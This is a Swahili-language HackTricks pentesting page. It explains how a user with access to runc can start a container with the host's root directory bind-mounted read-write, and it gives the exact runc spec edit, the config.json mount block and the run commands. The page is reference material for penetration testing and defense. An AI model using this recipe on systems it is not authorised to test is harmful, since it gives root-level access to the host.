Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

RunC Privilege Escalation

Support HackTricks

Taarifa za Msingi

Ikiwa unataka kujifunza zaidi kuhusu runc angalia ukurasa ufuatao:

2375, 2376 Pentesting Docker

PE

Ikiwa unapata kwamba runc imewekwa kwenye mwenyeji unaweza kuwa na uwezo wa kuendesha kontena ukitumia folda ya mizizi / ya mwenyeji.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

Hii haitafanya kazi kila wakati kwani operesheni ya default ya runc ni kukimbia kama root, hivyo kukimbia kama mtumiaji asiye na mamlaka haiwezi kufanya kazi (isipokuwa una usanidi usio na root). Kufanya usanidi usio na root kuwa wa default si wazo zuri kwa ujumla kwa sababu kuna vizuizi vingi ndani ya kontena zisizo na root ambavyo havihusiani na kontena zisizo na root.

Support HackTricks
PreviousPayloads to executeNextSELinux

Last updated